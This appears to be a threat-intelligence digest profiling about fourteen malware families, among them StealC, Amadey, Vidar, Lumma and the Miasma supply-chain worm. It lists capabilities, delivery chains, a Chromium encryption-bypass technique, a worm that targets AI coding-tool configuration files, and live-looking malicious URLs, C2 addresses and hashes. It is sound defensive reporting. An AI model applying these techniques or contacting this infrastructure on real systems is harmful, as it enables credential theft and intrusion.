Trending Malware

StealC is a malware-as-a-service infostealer active since January 2023 and widely described as an infostealer-as-a-service or information-stealing malware with optional dropper/loader functionality. It is designed to extract passwords, stored access data, digital identities, authentication cookies, session tokens, autofill data, credit card details, cryptocurrency wallet data, browser extensions, and files matching operator- or affiliate-defined patterns from compromised Windows systems. Reported targets include Chromium-based and Gecko-based browsers, desktop applications, mail and messaging clients such as Outlook, Thunderbird, Telegram and Discord, file transfer and VPN tools such as FileZilla, WinSCP, OpenVPN and ProtonVPN, gaming applications such as Steam, and crypto wallets. StealC also collects broad system information from infected hosts and can download and execute follow-on payloads, making it useful both for credential theft and as an initial-access enabler in larger attack chains. The malware is sold to affiliates through a self-hosted control-panel model and has been advertised on criminal forums by the actor using the moniker "plymouth." Content indicates StealC received a major version 2 architectural update in March 2025 and had reached versions around 2.22.x by mid-2026. Researchers describe StealC v2 as using JSON over HTTP with RC4-encrypted communications and per-build or per-victim configuration. Affiliates operate their own infrastructure rather than relying on a single centralized backend. StealC is frequently used alongside Amadey, which commonly provides initial access or delivers StealC as a second-stage payload. Observed delivery vectors in the provided content include phishing, software downloads from untrusted sources, fake software updates, cracked software installers, third-party malware loaders, SEO abuse, malvertising, GitHub and GitLab-hosted payloads, and traffic-team distribution through social media and forums. One documented December 2025 campaign used Amadey to download StealC from https://gitlab[.]bzctoons.net/suau/fds/-/raw/main/protected.zip, extract x64_protect.exe, and connect to a StealC C2 at http://158.94.208.130/8528aa6d5ece46dc.php. Reported sample hashes from that campaign include StealC payload SHA256 b5d4cc84845cb101f8bda324729ebedd8acd36cc8ec32f80969c4fb6d3c2b8a7. StealC has also been observed delivering or facilitating additional malware, including Amadey, AsyncRAT, RedLine Stealer, Vidar, XTinyLoader, XMRig, HijackLoader, SectopRAT, SmokeLoader, zgRAT, and in at least one case LockBit Black ransomware via XTinyLoader. This supports its role in broader cybercrime workflows involving credential theft, resale of logs, fraud, and follow-on ransomware deployment. The malware has been the subject of major international disruption activity under Operation Endgame in June 2026. Europol, Microsoft, Proofpoint, IBM X-Force, ESET, BitSight, Shadowserver, and multiple law-enforcement agencies targeted StealC infrastructure, with reporting tying the broader action to 326 servers, 142 domains, roughly 27 million stolen credentials, and more than EUR 41 million in criminal crypto assets. Microsoft reported that infrastructure tied to Amadey and StealC reached more than 140,000 infected machines globally in early May, and that more than 200 command-and-control servers were disrupted. Proofpoint and IBM X-Force reported discovering and exploiting a directory traversal vulnerability in the PHP-based StealC C2 panel, caused by improper sanitization of filenames containing forward slashes during ZIP extraction, which allowed web-shell upload to StealC servers; the developers patched this flaw in February 2026. High-confidence indicators and observables directly mentioned in the content include the GitLab payload URL above; StealC C2 http://158.94.208.130/8528aa6d5ece46dc.php; and references to StealC V2 / v2.22.x. The malware is consistently characterized in the content as a pervasive infostealer in the cybercrime ecosystem, used for theft of credentials and sensitive data for later illicit use including account compromise, data trading, fraud, and enabling downstream intrusions.

Amadey is a modular malware-as-a-service loader/botnet active since 2018 and sold on Russian-language or darknet forums. It is primarily used as a dropper/loader to provide initial access to compromised Windows systems and deliver second-stage payloads, including infostealers and ransomware-related malware. Multiple sources in the content describe Amadey as frequently used alongside StealC, with Amadey enabling access and payload delivery while StealC steals credentials and other sensitive data. The malware is mainly disseminated through phishing campaigns, though reporting in the content also notes delivery via fake software updates, cracked software installers, third-party malware loaders, GitHub in earlier activity, and an exploited self-hosted GitLab instance in a documented 2025 campaign. In that campaign, Amadey downloaded additional components including a clipper plugin and the StealC infostealer from gitlab.bzctoons.net. Amadey is described as modular and capable of more than simple payload delivery. Reported capabilities include downloading and executing follow-on malware, information stealing, credential theft, clipboard monitoring or clipper functionality, screenshot capture, data exfiltration, and remote-access/RAT-like features including VNC-based access. One source states the main bot effectively works as a RAT, with dynamically tasked payload distribution from C2. ESET reporting in the content notes modules for clipboard monitoring, credential theft, and VNC-based remote access. Europol-linked reporting also states Amadey can retrieve sensitive data from infected systems. Technical details directly mentioned in the content include HTTP-based C2 communications, RC4-encrypted communications or data exchange, hardcoded C2 URLs, embedded build identifiers, and anti-sandbox behavior requiring a live C2 response before registration and persistence complete. In the Trellix-described December 2025 campaign, Amadey used a mutex named f936986d553273aef6eeaeef713ad28f, stored an RC4/decryption key 828065b4fbbccc7d69743a0648c2f656 and bot ID 07072f in plaintext, beaconed to 91.92.243.129/0gjSy4hf3/index.php, requested plugin clip64.dll, downloaded StealC from https://gitlab.bzctoons.net/suau/fds/-/raw/main/protected.zip, and established persistence via the scheduled task file C:\Windows\Tasks\Yfgfwb.job. Reported hashes from that campaign were d7a366fa4d31c901ce3bcb6760d7bb5aa7cab49bb54d8c6551b3df14c8cf64e7 for the Amadey loader Yfgfwb.exe, bae0f38f58ad93728261f09840721ebedb9669a445f40083396fdd0da38a22a7 for clip64.dll, and b5d4cc84845cb101f8bda324729ebedd8acd36cc8ec32f80969c4fb6d3c2b8a7 for the StealC payload x64_protect.exe. The content links Amadey to broad criminal use in larger attack chains and ransomware enablement. It is characterized as an early-stage access and delivery component in the cybercrime supply chain and as infrastructure disrupted during Operation Endgame in June 2026. Microsoft, Europol, and partners reported that Amadey and StealC shared infrastructure despite being developed by separate actors, and Microsoft also cited observed use of Amadey by the Russian-affiliated actor Secret Blizzard to deploy custom malware against targets in Ukraine. Targeting is broad and global rather than sector-specific in the provided content, with infections and victim systems discussed worldwide.

SocGholish, also known as FakeUpdates, is a malware dropper/loader and initial-access service distributed via fake browser or software update prompts served from compromised websites, especially compromised WordPress sites. The malware is used to gain unauthorized access to victim systems and deliver next-stage malware, supporting downstream ransomware, data theft, financial fraud, and attacks on critical infrastructure. Multiple sources in the content describe large-scale remediation of SocGholish-infected WordPress sites, including nearly 15,000 compromised websites, and note that the malware was offered as cybercrime-as-a-service. The content links SocGholish to the Russian cybercriminal group Evil Corp and states it has been associated with ransomware and money-laundering operations. Reported infrastructure actions tied to Operation Endgame included disruption of SocGholish infrastructure, seizure of domains and servers, and victim notification efforts. High-confidence infection behavior in the content includes fake browser-update scams on compromised websites and use of compromised WordPress sites as the primary delivery vector.

Vidar is a Windows infostealer malware family, also referred to as Vidar Stealer and in some reporting as Vidar v2. It is described as an actively developed malware-as-a-service infostealer and was among the more prevalent infostealer services observed in 2025. Its core capability is theft of sensitive data including login credentials, browser history, cookies, autofill data, saved payment information, cryptocurrency wallet data, messaging application files, screenshots, and other host information. Reporting also places Vidar within the broader cybercriminal access-brokering ecosystem, where stolen logs and credentials are used or resold to support follow-on intrusion activity. High-confidence reporting in the provided content shows Vidar targeting browser-stored data from Chromium-based and Gecko-based browsers, and newer Vidar development introduced a technique to bypass Chromium Application-Bound Encryption (ABE). That technique scans browser memory for the encrypted v20_master_key, invokes CryptUnprotectMemory inside the browser process via APC injection, verifies the recovered key by attempting AES-256-GCM decryption of ABE-protected data, and then re-encrypts the key in memory. One cited Vidar 2.1 sample is associated with hash 459daa809751e73f60fbbe4384a7d1653c36bb06945e4eb3635270924241100a. Separate reporting states Vidar v2 was delivered entirely in memory by a Go-based launcher and exfiltrated stolen data through an encrypted proxy tunnel. Observed infection and delivery vectors in the content include distribution through other malware and traffic-distribution ecosystems. Vidar was seen delivered by StealC affiliates, by Amadey botnet clusters, through ClickFix campaigns, through compromised WordPress sites using the ErrTraffic framework, through Steam Wallpaper Engine abuse, and in a Ukraine-focused GhostShell campaign using a malicious archive named Besomar_documentation.rar. In the GhostShell case, the launcher 22.exe delivered Vidar v2 in memory; associated infrastructure included cloudaxis[.]cc, cdnexpress[.]cc, 154.58.204[.]149, 5.252.177[.]88, 5.181.156[.]168:25475, and 86.54.25[.]2. In ErrTraffic activity, the Analytics cluster used Polygon wallet address 0x08207B087F61d7e95E441E15fd6d40BEfd6eD308 to resolve C2 domains and fetch Vidar payloads during April and May 2026. The malware is associated in the content with multiple criminal ecosystems rather than a single actor. It is referenced alongside operations involving StealC, Amadey, Scattered Spider, and MaaS distribution clusters such as ErrTraffic. Scattered Spider advisories list VIDAR Stealer among malware used by that group. Vidar also appeared in infrastructure and payload observations tied to BraZZZerS Fast Flux, StealC-linked delivery chains, Amadey clusters, and gamer-targeting Steam wallpaper campaigns. Targeting reflected in the content includes general credential theft at scale, enterprise access enablement, cryptocurrency theft, gamers, and in at least one campaign, Ukraine’s drone and defense supply chain ecosystem. Known indicators and artifacts directly mentioned in the content include the Vidar 2.1 hash 459daa809751e73f60fbbe4384a7d1653c36bb06945e4eb3635270924241100a; GhostShell-related files 22.exe, 122.exe, update.exe, and MicrosoftUpdate-1.302.1609.vbs; the lure archive Besomar_documentation.rar; domains cloudaxis[.]cc and cdnexpress[.]cc; Telegram resolver t[.]me/flufff6262; beacon path https://cdnexpress[.]cc/analytics; and the ErrTraffic Analytics wallet address 0x08207B087F61d7e95E441E15fd6d40BEfd6eD308.

Cobalt Strike is a commercial penetration-testing and red-team framework that is frequently abused by threat actors as post-exploitation malware, most notably through its Beacon payload for command-and-control, remote access, lateral movement, and in-memory execution. The content directly associates it with deployment by multiple intrusion sets and malware delivery chains, including APT29/Nobelium in 2021 campaigns against European governments, TA577 phishing campaigns, Hancitor, SquirrelWaffle, SharkLoader in Kaspersky’s StrikeShark campaign, and follow-on activity in the SolarWinds compromise and the 2025 Notepad++ supply-chain attack. Reported targets and victim sectors linked to Cobalt Strike use in the provided content include European governments, diplomatic and government organizations, software development companies, telecommunications, financial organizations, and other selectively targeted entities across countries including Indonesia, Taiwan, Hong Kong, Lebanon, Syria, Colombia, North Macedonia, Nepal, Serbia, Vietnam, El Salvador, Australia, and the Philippines. Observed delivery and infection vectors in the content include HTML smuggling attachments, phishing documents, malicious HTML files, exploitation of internet-facing vulnerabilities, trojanized software installers, malware loaders, and compromised software update infrastructure. Specific loaders and droppers mentioned as delivering Cobalt Strike include SharkLoader, Hancitor, SquirrelWaffle, and trojanized installers in the Notepad++ campaign. In the StrikeShark reporting, SharkLoader used DLL side-loading and Perfect DLL Hijacking, decrypted and loaded components including DscCoreR.mui and SyncRes.dat, installed API hooks with Microsoft Detours and MinHook, hooked VirtualAlloc and Sleep, and resumed a suspended thread to execute Cobalt Strike Beacon while attempting to evade memory scanning. The content describes Cobalt Strike as being used to maintain remote access, move through victim networks, support reconnaissance and credential theft, and load .NET assemblies in memory via execute-assembly. It is also referenced as common red-team C2 tooling alongside Sliver and Mythic, and as a framework often used before ransomware deployment, including in Hancitor-related intrusions and as an initial delivery path for LockBit 3.0. Detection-relevant details directly mentioned in the content include the command line pattern "conhost.exe 0xffffffff -ForceV1" observed during some Cobalt Strike payload execution, remote service installation and Beacon deployment telemetry, named pipe activity, PowerShell injection, and infrastructure characteristics such as APT29/Nobelium Cobalt Strike C2 setups using custom certificates, redirectors, and mod_rewrite-based redirection. Additional infrastructure references include a repurposed Cobalt Strike C2 at 194.165.16[.]80 and broad discussion of hunting Cobalt Strike C2 infrastructure via internet-exposed services.

Lumma Stealer, also referred to as Lumma and LummaC2, is a commercial malware-as-a-service infostealer that has been openly traded on Russian-speaking cybercrime forums since 2022. It is tracked by Microsoft as Storm-2477 and was described as one of the most prevalent infostealer services in 2025 until an international law-enforcement and industry disruption in May 2025. The malware is used by affiliates rather than a single threat actor group, with operators using a centralized web panel to generate builds and retrieve stolen logs. Its core capability is theft of browser session cookies, saved logins, passwords, autofill data, cryptocurrency wallets, browser extensions, MFA-related data, and financial credentials. The content also states that Lumma logs have been widely sold on illicit forums, and that ransomware syndicates and other criminal actors have used Lumma to obtain initial access into corporate networks. Lumma has also been referenced as both a credential theft tool and a dropper for additional malware in Black Basta activity. Observed delivery vectors include phishing emails disguised as hotel bookings or invoices, fake CAPTCHA and ClickFix social-engineering chains, malvertising, poisoned search ads for common software, cracked or pirated software, GitHub and cracked-software forum lures, and distribution by other malware loaders such as Amadey. Multiple campaigns described in the content relied on tricking users into opening the Windows Run dialog and executing clipboard-pasted PowerShell or mshta commands, which then downloaded and launched Lumma in the background. One campaign used compromised websites and EtherHiding infrastructure with payload components stored on Binance Smart Chain; another targeted visitors of Arabic pirated movie sites and used a legitimate Adobe-signed executable vulnerable to DLL sideloading, where a malicious sqlite.dll was identified as Lumma Stealer. The malware has been associated in reporting with widespread criminal use and downstream ecosystem activity. Microsoft tracks Lumma’s core developer as Storm-2477. The content also states that Black Basta used LummaC2, that Amadey clusters frequently delivered Lumma payloads, and that Lumma was among leading observed infections in Mexico in 2025. INTERPOL reporting cited in the content also listed Lumma among top banking trojan and infostealer families in Asia and the South Pacific. High-confidence indicators and technical details mentioned in the content include use of fake CAPTCHA chains with Win+R/Ctrl+V execution, PowerShell and mshta download cradles, Prometheus TDS redirection to binadata[.]com in a Canada-targeted campaign, retrieval of a JavaScript stage from 185.147.125[.]174, EtherHiding infrastructure referencing data-seed-prebsc-1-s1.bnbchain[.]org and check.foquh[.]icu, and a hard-coded anti-analysis failsafe that hashes the local username and computer name and exits if the values match 0x56CF7626 or 0xB09406C7. Additional campaign-specific IOCs tied to Lumma delivery in the content include accentypastedw[.]store, onefreex[.]com, rentry[.]co, 188.114.97[.]3, 104.26.3[.]16, 172.67.194[.]91, filehere0987[.]b-cdn[.]net, and SHA-1 bfc1422d1c5351561087bd3e6d82ffbad5221dae for a malicious sqlite.dll identified as Lumma Stealer.

ModeloRAT is a Python-based remote access trojan/backdoor associated with the financially motivated initial access broker Woodgnat, also known as KongTuke. Reporting links its use to access-broker activity supporting ransomware ecosystems including Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta, and Symantec separately observed ModeloRAT in attacks that deployed Qilin ransomware. The malware has been delivered into corporate environments through social-engineering campaigns, including ClickFix/CrashFix-style lures on compromised WordPress infrastructure and, from at least April 2026, Microsoft Teams messages impersonating IT or help-desk staff that trick victims into running malicious PowerShell commands. Huntress first reported on ModeloRAT in January 2026 during investigation of the CrashFix campaign. Observed delivery chains include malicious PowerShell that downloads a portable WinPython environment and launches ModeloRAT via a signed or bundled pythonw.exe interpreter. In Teams-based intrusions, reported artifacts included scriptA.vbs, StartManagerB.lnk, Pmanager.py, and the portable Python runtime WPy64-31401, with persistence established through Startup shortcuts, VBScript launchers, Run keys, and scheduled tasks. Reporting also states that newer variants use multiple independent command-and-control paths, automatic failover across a server pool, randomized URL paths, self-update capability, and multiple access channels including a primary RAT, reverse shell, and TCP backdoor. High-confidence capabilities directly described in the source material include collection of system and user information, screenshot capture, file exfiltration, and resilient persistence inside enterprise networks. Related reporting states that ModeloRAT commonly targets domain-joined or corporate systems and has been used in attacks against organizations in sectors including education, insurance, IT, and professional services. Additional infrastructure and behavior linked in the content include RC4-encrypted command-and-control communications, multiple independent C2 paths, and delivery through KongTuke traffic-distribution infrastructure built on compromised WordPress sites and fake CAPTCHA/ClickFix lures.

RedLine Stealer is a customizable information-stealing trojan and infostealer, written in .NET/C#, first identified in 2020. It is detected by ESET as MSIL/Spy.RedLine and MSIL/Spy.Agent. The malware is designed to collect passwords, cookies, credit card data, location and other system information, and browser data. Reported targeting includes credentials and data from browsers such as Google Chrome and Mozilla Firefox, as well as applications and services including Discord, FileZilla, Steam, Telegram, and VPN clients such as OpenVPN and ProtonVPN. The malware can also search for files, upload them to a remote server, download additional files, and execute them, and reporting notes it can be used to deliver additional malware including ransomware, RATs, trojans, miners, and other payloads. RedLine appears repeatedly in commodity cybercrime and infostealer ecosystems. It has been observed as a payload delivered by other malware and loader operations including StealC-linked activity, Amadey, and multi-stage cracked-software infection chains. It is also referenced in broader credential-theft and traffic-team ecosystems, where stolen logs are monetized through criminal markets and Telegram channels. Reporting cited in the content states that LAPSUS$ acquired and used the RedLine password stealer in its operations. Observed delivery vectors in the content include phishing campaigns, fraudulent websites, malicious applications, cracked or pirated software lures, SEO abuse, and Discord messages from compromised accounts carrying password-protected ZIP archives. One analyzed infection chain showed RedLine abusing AppLaunch.exe from the .NET Framework directory and using configuration pointing to net.tcp://45.15.156.187:23929/, with the botnet identified as "LogsDiller Cloud (Telegram: @logsdillabot)." Another mention lists a RedLine C2 as hrabrlonian[.]xyz:81 / 45.130.151[.]133. Law-enforcement reporting in the content states that in October 2024 international authorities announced the takedown of the RedLine and META infostealers after seizing domains, servers, and Telegram accounts used by their administrators, and other reporting notes that RedLine variants disappeared due to coordinated law-enforcement action. The content also references Operation Endgame datasets derived primarily from RedLine and Meta stealer logs seized during enforcement actions.

Gh0st RAT is a long-lived remote access trojan (RAT) whose source code was released publicly in 2008, leading to widespread reuse, modification, and actor-specific forks by both cybercriminal and APT operators. It is also referenced by aliases including Gh0st, Gh0stRAT, Moudoor, and Mydoor. The malware first gained major attention in 2009 in GhostNet espionage activity targeting diplomatic, political, economic, and military entities worldwide. Based on the provided content, Gh0st RAT is a Windows-focused RAT family with broad remote administration capability, and variants or derivatives have also appeared on Linux. Reported capabilities and behaviors include command execution, file download and file operations, keylogging, clipboard theft or hijacking, screen capture, system information gathering, active-window logging, process injection, and persistence. Persistence mechanisms explicitly mentioned include creating a new Windows service and using Task Scheduler COM interfaces to create scheduled tasks. Linux Gh0st RAT variants detected as Linux/Rekoobe-A were described as inspecting crafted ICMP traffic and using it to trigger either a reverse shell or a listener on port 31234. The malware is frequently used as a base for customized implants. The content explicitly notes modified or related families including GodRAT, which is based on the Gh0st RAT codebase; Dragon Breath/APT-Q-27 payloads described as modified open-source Gh0st RAT; GALLIUM’s customized Gh0st RAT variant QuarkBandit; and multiple actor-specific forks observed by researchers. One report states that a Dragon Breath debug-build sample contained Gh0st RAT source code. Another notes that Webworm developed customized versions of Gh0st RAT alongside Trochilus and 9002 RAT. Threat actor and campaign associations directly mentioned in the content include GhostNet; GALLIUM targeting telecommunications providers in Southeast Asia, Europe, and Africa; Dragon Breath/APT-Q-27 targeting primarily Chinese-speaking users and online-gambling-related victims; Webworm/Space Pirates targeting government and enterprise sectors including IT services, aerospace, and electric power in Russia, Georgia, Mongolia, and other Asian countries; and infrastructure overlap with ValleyRAT activity in June 2026 WhatsApp-delivered VBScript campaigns that ultimately installed ManageEngine Endpoint Central. The content repeatedly notes that such overlap is insufficient on its own for confident attribution in those WhatsApp campaigns. Targeting described in the content spans diplomatic, political, economic, and military organizations; telecommunications providers; government agencies; IT services, aerospace, and electric power sectors; Chinese-speaking users seeking unofficial Telegram and WhatsApp downloads; online-gambling-related victims; and financial trading and brokerage firms in campaigns involving the Gh0st-derived GodRAT. Infection and delivery methods mentioned include DLL sideloading, trojanized installers, malicious .scr and .pif files disguised as financial documents and distributed via Skype, fake Telegram and WhatsApp download sites, and use as second-stage payloads after web-shell or exploit activity. The content also describes COM-based persistence and service creation behavior in some variants. High-confidence indicators and protocol details directly mentioned include infrastructure overlap on IP 202.61.160[.]201 previously associated with ValleyRAT and Gh0st RAT activity; Gh0stKCP, a UDP-based protocol used by ValleyRAT and identified in traffic linked to overlapping infrastructure at 143.92.37.168:10086; Dragon Breath stage-4 C2 domain qaqkongtiao[.]com; Dragon Breath mutex Global\DHGGlobalMutex; and a Windows RAT variant observed by ESET that changed the Gh0st RAT packet flag to the string "lambo."

Miasma is a self-propagating software supply-chain worm and credential-stealing attack framework, also tracked as “The Spring Blight,” and described as an evolution or variant of the earlier Shai-Hulud / Mini Shai-Hulud malware lineage. Reporting links it to a broader cluster that also includes Hades, and some sources associate the lineage with TeamPCP, although direct attribution of all Miasma activity remains unclear. The malware has targeted developer ecosystems, CI/CD pipelines, GitHub repositories, and package registries including npm, PyPI, RubyGems, and JFrog Artifactory. Public reporting also links it to compromises affecting Red Hat npm packages, Microsoft GitHub repositories, the LeoPlatform and RStreams npm ecosystems, and a Go module tied to the Verana Blockchain project. Miasma infects developer workstations and CI runners, steals a broad set of credentials and secrets, and uses those credentials to propagate by modifying legitimate repositories and publishing trojanized package versions. Reported targets include GitHub personal access tokens, GitHub Actions secrets and OIDC tokens, npm and PyPI tokens, AWS, Azure, and Google Cloud credentials, Kubernetes service account tokens and configs, HashiCorp Vault credentials, SSH private keys, Docker auth files, JFrog Artifactory credentials, 1Password data, GPG material, .env files, CI secrets, and AI coding tool configurations for tools such as Claude, Cursor, Gemini, Copilot, Kiro, and Cline. Multiple reports state that it also scrapes GitHub Actions runner memory on Linux to extract secrets not exposed as environment variables. Propagation and execution tradecraft varies by wave. Earlier variants used npm lifecycle hooks, while later variants used binding.gyp / node-gyp execution during npm install to avoid visible install or postinstall scripts. Several reports describe a Bun-based multi-stage payload: malicious packages replaced normal code with a heavily obfuscated JavaScript loader, downloaded and executed the Bun runtime, wrote the worm payload to a temporary path, executed it with bun run, and deleted the temporary file. The malware has also been observed pushing weaponized GitHub Actions workflows, abusing GitHub OIDC trusted publishing to release malicious npm packages with valid SLSA provenance attestations, poisoning repositories through orphan commits and branch mutations, and targeting source-repository execution paths in IDE or AI coding assistant environments rather than relying only on package-manager hooks. Miasma commonly exfiltrates stolen data through GitHub rather than traditional dedicated C2 infrastructure. Reports state that it creates public repositories using victim accounts, uploads encrypted JSON results, and uses recognizable campaign markers such as the repository description “Alright Lets See If This Works.” Additional strings linked to the malware family include “RevokeAndItGoesKaboom,” “TheBeautifulSandsOfTime,” “thebeautifulmarchoftime,” and “firedalazer.” Some reporting states that Miasma polls GitHub commit search or public commits for commands, configuration, payload locations, or attacker-controlled tokens. Public reporting also describes a destructive dead-man-switch behavior in some variants: when a stolen GitHub token used for exfiltration is revoked, the malware may trigger deletion of files in the victim’s home and Documents directories, using a systemd service on Linux or a LaunchAgent on macOS, with activity persisting for up to 72 hours. Observed evasion and anti-analysis features include heavy obfuscation, layered encryption such as ROT-style encoding and AES-GCM, polymorphic or per-build payload variation, checks for security tools including CrowdStrike and SentinelOne, and a Russian locale guard or killswitch. Reported malicious artifacts and indicators include binding.gyp, .github/setup.js, _index.js, .claude/setup.mjs, .claude/settings.json, .cursor/rules/setup.mdc, .gemini/settings.json, and .vscode/tasks.json. Reported hashes directly associated with Miasma-related reporting include SHA-256 ceff7c51d70832c3ec8dd2744b606a23b3c924ef664ae23439b9b742ea154108, 9f93d77d32833a515bc406c46da477142bb1ac2babeecb6aa42f98669a6db015, 6331d1511783dcb1158fb54775f563e90399b3a2a81a584d3cba9a77f63d15a7, 58215f1d737443fd782f91c57ec10ad58109a96470054707fc6bfd6358abe468, and 3f3f42d072bd36860ab7bd7fb5e10ac0d22c741c13c89505ccd6ec0ea572eea7.

SmokeLoader is a malware loader/backdoor, also referred to as Dofoil, whose capabilities vary by the modules included in a given build. The content describes it as using deception and self-protection techniques, random API function calls, and a multi-stage decryption process. It uses HTTP for command-and-control, and some reporting notes that it may generate requests to legitimate sites such as microsoft.com, bing.com, and adobe.com to mask activity; downloads may also return HTTP 404 responses that still contain data in the response body. SmokeLoader has been used both as a payload and as a delivery mechanism for other malware. Reported follow-on or associated payloads in the content include Phobos ransomware in 8Base intrusions, as well as Amadey and other commodity malware families. VMware Carbon Black reported that in 8Base activity, SmokeLoader provided initial obfuscation, unpacking, and loading of Phobos ransomware, while SystemBC encrypted command-and-control traffic. The malware is also mentioned in campaigns or ecosystems involving TA577 phishing operations, StealC-linked delivery chains, DanaBot-delivered payloads, and ErrTraffic campaigns. TA577, described in the content as a Russia-based threat group, has delivered SmokeLoader alongside Qbot, IcedID, SystemBC, Ursnif, Cobalt Strike, Pikabot, and DarkGate. The content also links SmokeLoader to broader criminal loader ecosystems repeatedly targeted by Operation Endgame, including server seizures and disruption of botnet customers and infrastructure in 2024-2026. A specific IOC mentioned in the content is the MD5 hash e818a9afd55693d556a47002a7b7ef31, labeled as a SmokeLoader hash.

Mistic is a stealthy backdoor, also tracked as MLTBackdoor/MLTBackdoor, that has been used since April 2026 in financially motivated intrusions targeting organizations in the insurance, education, IT, and professional services sectors. Reporting links it with low confidence to the initial access broker KongTuke, also known as Woodgnat, a criminal actor assessed to compromise enterprise networks and sell access to ransomware operators. KongTuke-linked access has been associated with ransomware ecosystems including Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta. Observed delivery and execution involved DLL sideloading through the legitimate Microsoft executable MpExtMs.exe. In reported cases, a malicious loader DLL named version.dll loaded the Mistic payload from EndpointDlp.dll, a filename chosen to resemble Microsoft endpoint-security tooling. Separate intrusions also included a .NET DLL that displayed a fake login screen to steal credentials. Zscaler documented the malware earlier in June 2026 under the name MLTBackdoor and observed delivery through a multi-stage ClickFix infection chain. Mistic provides standard backdoor functionality including upload, download, move, rename, and delete operations on files, folder creation, configurable command-and-control check-in intervals, and retrieval of additional commands from attacker-controlled infrastructure. It can execute payloads or code received from command-and-control directly in memory, avoiding disk writes and reducing file-based detection opportunities. Multiple reports also state that it can load Beacon Object Files to extend functionality in memory. A built-in kill switch allows the malware to terminate and delete itself from the infected host, further increasing stealth and making it suitable for long-term covert access. Mistic has been observed alongside ModeloRAT, another KongTuke/Woodgnat-linked remote access tool, and the broader activity has been described as opportunistic targeting consistent with an initial access broker model rather than direct ransomware deployment by the same operator. Reported indicators of compromise include EndpointDlp.dll SHA-256 1e41c7bfaa6aa3b93b6cc024274a10e33f3e12fe7c98c1db387ef8927f9d1984, loader version.dll SHA-256 59e3c4cb06331b4f2d78a9a0592f3747e573bd01c5a7650c26361d1e25520712, IPs 142.93.242.144, 144.31.53.78, 198.13.159.44, and 199.91.221.42, domains authorized-logins.net, thomphon.com, updater-worelos.com, upd-domain-goloro.com, upscale-kolo.com, and sql-updater-service.com, and the delivery URL hxxp://thomphon.com/update.msi.

FortigateSniffer is a custom Golang-based credential-harvesting tool used in the FortiBleed campaign against compromised FortiGate firewalls since at least February 2026. It is also tracked as fg_sniffer and has been reported as compiled for both Linux and Windows, including fg_sniffer_linux_amd64 and fg_sniffer_windows_amd64.exe. Rather than relying on a traditional exploit payload for packet capture, the tool abuses the legitimate FortiOS diagnostic command "diagnose sniffer packet" to passively intercept authentication traffic traversing infected FortiGate appliances. Reported capabilities include simultaneous monitoring of 24 protocols and parsing of authentication material from intercepted flows. Protocols explicitly mentioned in the reporting include Kerberos, LDAP, SMB, RADIUS, RDP, WinRM, SMTP, FTP, MySQL, Microsoft SQL Server, PostgreSQL, Telnet, RPC, and TACACS+. The tool and associated processing pipeline were reported to extract plaintext usernames and passwords, NTLM/NTLMv2 hashes, Kerberos hashes and tickets, session cookies, tokens, email credentials, database credentials, and other authentication artifacts. Some reporting states that captured output was converted into PCAP/PCAPNG format and further analyzed by tooling referred to as SNIFTRAN and a PCAP Deep Analysis Toolkit. Deployment occurred after attackers gained administrative or SSH access to FortiGate devices through brute force, credential stuffing, dictionary attacks, leaked credentials, and exploitation of unpatched FortiGate vulnerabilities. The malware was described as turning compromised firewalls into passive credential collectors positioned at the network boundary. Researchers reported geofencing and time-based execution controls, including activation only for certain IP ranges and operation during 07:00-18:00 Moscow time. FortigateSniffer is associated in the reporting with the broader FortiBleed operation, which researchers assessed as likely run by a financially motivated initial access broker; some reporting notes possible Russian-speaking links, though attribution remains unconfirmed. Targeting was global across FortiGate devices, with emphasis on small and medium-sized organizations, especially in the United States and India, and notable interest in IT providers and managed service providers. The harvested credentials were reportedly fed into distributed cracking and validation infrastructure and then reused for lateral movement, Active Directory reconnaissance, SMB/network-share access, session hijacking, and potential resale of access for follow-on criminal or espionage activity.

ValleyRAT is a modular, full-featured remote access trojan (RAT) written in C++ and built on the Winos4.0 framework, which multiple sources describe as rebuilt from or derived from Gh0stRAT. The payloads generated by Winos4.0 are referred to by Proofpoint as ValleyRAT, and the malware is also referenced as Winos4.0 or Winos 4.0 in reporting. It provides operators with broad remote access functionality and has been observed in cyber-espionage and financially motivated campaigns. Reported capabilities include command-and-control communications, system reconnaissance, persistence, command execution, file upload and download, payload injection, credential harvesting, keylogging, and on-demand module delivery. Specific behaviors documented for ValleyRAT_S2, described as a second-stage ValleyRAT payload, include reconnaissance of OS, locale, architecture, environment variables, registry settings, installed software, drives, file systems, and running processes; persistence via Task Scheduler COM APIs; process injection using SetThreadContext, WriteProcessMemory, and CreateRemoteThread; keystroke monitoring via SetWindowsHookEx; dynamic API resolution via LoadLibrary and GetProcAddress; watchdog recovery using %TEMP%\target.pid and %TEMP%\monitor.bat; staging under %APPDATA%\Promotions\Temp.aps; execution through cmd.exe; and retry/delay logic to reduce detection. Proofpoint additionally states ValleyRAT supports DDoS functionality and can download additional modules on demand. Observed delivery and execution methods include fake Chinese-language software installers, DLL side-loading with malicious DLLs such as steam_api64.dll and apphelp.dll placed beside legitimate signed applications, phishing attachments, compressed archives with disguised executables, abuse of software update channels, and downloader activity using Winos4.0. One analyzed sample masqueraded as an AI spreadsheet tool and used a malicious steam_api64.dll. Reporting also describes broader campaigns using DLL sideloading through files such as QQMusicCommon.dll, tedutil.dll, msys-2.0.dll, gxc_x64.dll, and VsGraphicsCore.dll, as well as WhatsApp- and phishing-driven delivery in some ecosystems associated with ValleyRAT or Winos4.0 activity. ValleyRAT has been linked in reporting to Chinese-speaking threat activity and is commonly associated with the Silver Fox cluster, although some specific campaigns with infrastructure overlap were not confidently attributed. Proofpoint reports TA4922 using ValleyRAT/Winos4.0 in financially motivated campaigns targeting organizations across East Asia, Europe, and South Africa, while other reporting notes targeting of Chinese-speaking regions including mainland China, Hong Kong, Taiwan, and Southeast Asia. Additional reporting describes Indonesia-focused tax-themed phishing delivering malware identified as ValleyRAT/Winos4.0/Backdoor SilverFox. High-confidence infrastructure and indicators mentioned in the content include command-and-control endpoints 27.124.3.175:14852 for ValleyRAT_S2 and 143.92.37.168:10086 using the Gh0stKCP protocol; IP 202.61.160.201 previously observed as infrastructure associated with ValleyRAT and Gh0st RAT activity; downloader activity to 154.201.68.57; and a sample hash d6387be78d258a820e4cb35ec53c65d52a813b63147488629b56269f6648adc1 for valleyrat_s2. Additional artifacts include %TEMP%\target.pid, %TEMP%\monitor.bat, %APPDATA%\Promotions\Temp.aps, and benign-looking names such as Telegra.exe and WhatsApp.exe used in memory or staging.

